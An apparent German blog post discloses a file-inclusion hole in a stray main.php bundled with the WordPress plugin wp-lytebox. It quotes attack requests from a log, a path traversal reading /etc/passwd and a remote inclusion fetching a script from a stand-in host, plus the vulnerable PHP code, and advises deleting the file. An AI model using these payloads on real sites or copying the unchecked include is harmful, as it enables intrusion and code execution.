Sicherheitsprobleme in wp-lytebox
Gestern beobachtete Tim in den Statistiken seiner Seite seltsame Suchbegriffe von Google: unter anderen war es “inurl:wp-lytebox site:de”. Solche Suchanfragen sind – finde ich – ziemlich typisch für einen Angriff auf die Webseite. Beobachtet man die Spur des Angreifers in der Logdatei, stellt man fest, dass gezielt nach der Datei “main.php” im Verzeichniss wp-content/plugins/wp-lytebox gesucht wurde.
Zuerst wurde der URL /wp-content/plugins/wp-lytebox/main.php?pg=../../../../../../../../../../../../../../../../etc/passwd%00 aufgerufen, später dann auch /wp-content/plugins/wp-lytebox/main.php?pg=http://example.org/deingefaehrlichesskript.txt?. Sieht man sich die Datei main.php genauer an, wird man schnell feststellen, dass sie eigentlich ziemlich überhaupt nichts mit wp-lytebox zu tun hat – und trotzdem befindet sie sich im Archiv, das man auf der Homepage von wp-lytebox herunterladen kann. Diese Datei ist an für sich nichts besonderes, außer dem Sicherheitsloch, das sie aufweist (Zeile 95 bis 103):
<?php $pg = $_GET['pg']; if(!isset($pg)) { include("pages/main.txt"); } elseif(isset($pg)) { include("pages/".$pg.".txt"); } ?>
Okay, hier wird also wieder mal ungeprüft die aus $_GET stammende Variable $pg in include() übernommen. Was hat das aber mit wp-lytebox zu tun? Es scheint, als sei die Datei aus Versehen in das Archiv von wp-lytebox gelangt. Füttert man Google mit dem Inhalt des <title>-Tags der Webseite, findet man tatsächlich eine Webseite, die die selbe Sicherheitslücke aufweist.
Die Sicherheitslücke wird offenbar bereits automatisiert ausgenutzt, sodass ich allen Nutzern von wp-lytebox nur empfehlen kann, zumindest die main.php zu löschen.
